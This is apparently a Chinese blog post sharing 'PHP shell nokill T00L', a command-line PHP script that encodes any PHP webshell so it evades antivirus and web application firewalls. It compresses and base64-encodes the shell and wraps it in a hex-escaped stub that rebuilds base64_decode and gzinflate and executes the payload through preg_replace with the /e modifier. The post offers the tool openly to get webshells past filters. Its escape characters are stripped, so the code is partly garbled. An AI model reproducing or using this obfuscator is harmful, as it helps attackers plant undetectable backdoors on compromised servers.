lostwolf写的

这不是webshell,只是个webshell免杀工具

切勿当初webshell使用

仅限免杀phpwebshell

该工具运行在 cli 模式！

如果有无法突破的文件内容过滤 可尝试下用这个工具 免杀大马！

任意php webshell 通过此工具编码之后可以饶过国内一些bt的防火墙

复制代码 代码如下:

<?php

/*

Title: PHP shell nokill T00L

Blog: exploit-db.blogcn.com

*/

error_reporting(0);

@ini_set('memory_limit','-1');

set_time_limit(0);

$toolname="$argv[0]";

if ($argc<2) {

baner($toolname);

die;

}

$input_file= trim($argv[1]);

$output_file='nokill_'.$input_file;

if (file_exists($input_file)) {

No_kill_c0de($input_file,$output_file);

echo "PHP shell nokill T00Lrn";

echo "Blog: exploit-db.blogcn.comrn";

echo "Input: {$input_file}rn";

$file_full_path=dirname(__FILE__).DIRECTORY_SEPARATOR.$output_file;

echo "[+] Generate success!rn";

echo "Saved to {$file_full_path}"."rn";

} else {

echo "PHP shell nokill T00Lrn";

echo "Blog: exploit-db.blogcn.comrn";

die("[-] Failed ! The File $input_file does not exist");

}

function No_kill_c0de($input_file,$output_file){

$no_whitespace=php_strip_whitespace($input_file);

$no_php_tag=trim(trim(trim($no_whitespace,'<?php'),'<?'),'?>');

$enfile=base64_encode(gzdeflate($no_php_tag));

$shellcode="x3cx3fx70x68x70xdxa";

$shellcode.='$enfile='.'"'."{$enfile}".'"'.';'."xdxa";

$shellcode.="x24x62x3dx73x74x72x5fx72x65x70x6cx61x63x65x28x27x66x27x2cx22x22x2cx22x62x66x61x66x73x66x65x66x36x66x34x66x5fx66x66x64x66x66x65x66x66x63x66x66x6fx66x66x64x66x66x65x66x22x29x3bxdxax24x67x3dx73x74x72x5fx72x65x70x6cx61x63x65x28x27x58x27x2cx27x27x2cx27x67x58x58x7ax58x58x69x58x58x6ex58x58x58x58x66x58x58x58x6cx58x58x61x58x58x58x74x58x58x58x58x58x65x27x29x3bxdxax70x72x65x67x5fx72x65x70x6cx61x63x65x28x27x5cx27x61x5cx27x65x69x73x27x2cx27x65x27x2ex27x76x27x2ex27x61x27x2ex27x6cx27x2ex27x28x24x67x28x24x62x28x24x65x6ex66x69x6cx65x29x29x29x27x2cx27x61x27x29x3bxdxa";

$shellcode.="x3fx3e";

file_put_contents("$output_file",$shellcode);

}

function baner($toolname){

echo "PHP shell nokill T00Lrn";

echo "Blog: exploit-db.blogcn.comrn";

echo "Usage: {$toolname} phpwebshellrn";

}

?>